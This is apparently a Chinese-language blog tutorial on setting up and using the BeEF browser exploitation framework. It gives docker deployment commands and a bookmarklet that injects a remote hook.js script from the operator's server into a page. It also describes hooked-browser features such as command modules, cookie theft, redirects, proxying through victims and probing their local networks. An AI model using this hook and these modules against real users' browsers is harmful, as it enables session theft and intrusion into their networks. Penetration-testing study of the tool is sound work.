本文所介紹技術僅供參考學習,切勿惡意用途。
0x01 beef簡介
BeEF是The Browser Exploitation Framework的縮寫。它是一種專注於Web瀏覽器的滲透測試工具。
官網:http://beefproject.com/
0x02 部署
docker pull janes/beef
docker run --rm -p 3000:3000 janes/beef
http://ip/ui/panel
0x03 使用介紹
開始:
在能夠完全探索框架之前,你必須“掛鈎”一個瀏覽器。首先,您可以在這里將瀏覽器指向基本演示頁面(http://192.168.129.132:3000/demos/basic.html),或者在這里指向高級版本(http://192.168.129.132:3000/demos/butcher/index.html)。
如果您想鈎住任何頁面(當然是為了調試),請將下面的bookmarklet鏈接拖到瀏覽器的書簽欄中,然后只需單擊另一個頁面上的快捷方式:Hook me!

1 javascript:%20(function%20()%20{%20var%20url%20=%20%27http:%2f%2f192.168.129.132:3000%2fhook.js%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();
當瀏覽器被鈎入框架后,它們將出現在左側的“鈎住的瀏覽器”面板中。掛鈎瀏覽器將以在線或離線狀態出現,這取決於它們最近對框架進行了輪詢。
掛鈎瀏覽器
要與一個鈎瀏覽器交互,只需左擊它,一個新標簽將出現。每個鈎住的瀏覽器選項卡都有許多子選項卡,如下所示:
主要:在運行一些命令模塊后,顯示有關所連接的瀏覽器的信息。
日志:顯示與這個特定的掛鈎瀏覽器相關的最近的日志條目。
指令:這個選項卡是可以針對已連接的瀏覽器執行模塊的地方。這是BeEF的大部分功能所在。大多數命令模塊由Javascript代碼組成,這些代碼針對所選的鈎狀瀏覽器執行。命令模塊能夠執行任何可以通過Javascript實現的操作:例如,它們可以收集有關鈎形瀏覽器的信息,操作DOM或執行其他活動,如利用鈎形瀏覽器的本地網絡中的漏洞。
每個指令模塊都有一個交通燈圖標,用於表示如下:
命令模塊針對目標工作,並且應該對用戶不可見
命令模塊針對目標工作,但可能對用戶可見
命令模塊還沒有針對這個目標進行驗證
命令模塊對這個目標不起作用
XssRays:XssRays選項卡允許用戶檢查頁面(瀏覽器連接的地方)的鏈接、表單和URI路徑是否容易受到XSS的攻擊。
附加條款:附加條款選項卡允許您代表所連接的瀏覽器提交任意HTTP請求。Rider發送的每個請求都記錄在History面板中。單擊歷史記錄項以查看HTTP響應的HTTP頭和HTML源。
網絡:“網絡”頁簽允許您與所鈎住的瀏覽器的本地網絡上的主機進行交互。
你也可以右鍵單擊一個掛鈎的瀏覽器,打開一個附加功能的上下文菜單:
隧道代理:該代理允許您使用鈎狀瀏覽器作為代理。只需右鍵單擊鈎狀瀏覽器樹左側的瀏覽器,並選擇“使用代理”。通過代理發送的每個請求都記錄在Rider選項卡的History面板中。單擊歷史記錄項以查看HTTP響應的HTTP頭和HTML源。
XssRays: XssRays允許用戶檢查頁面(瀏覽器所連接的地方)的鏈接、表單和URI路徑是否容易受到XSS的攻擊。要自定義XssRays掃描的默認設置,請使用XssRays選項卡。
更多:
想要了解更多關於BeEF的工作原理,請查看wiki:
- Architecture of the BeEF System: https://github.com/beefproject/beef/wiki/Architecture
- Tunneling Proxy: https://github.com/beefproject/beef/wiki/Tunneling-Proxy
- XssRays Integration: https://github.com/beefproject/beef/wiki/XssRays-Integration
- Writing your own modules: https://github.com/beefproject/beef/wiki/Command-Module-API
0x04 Commands
ps:感覺是不夠新,能用的少了十幾個。
這里記錄一下幾個常用的模塊
Browser:
- cookie
- 重定向(Redirect Browser)
Social Engineering:
准備加入的有
參考文章:http://www.vuln.cn/6966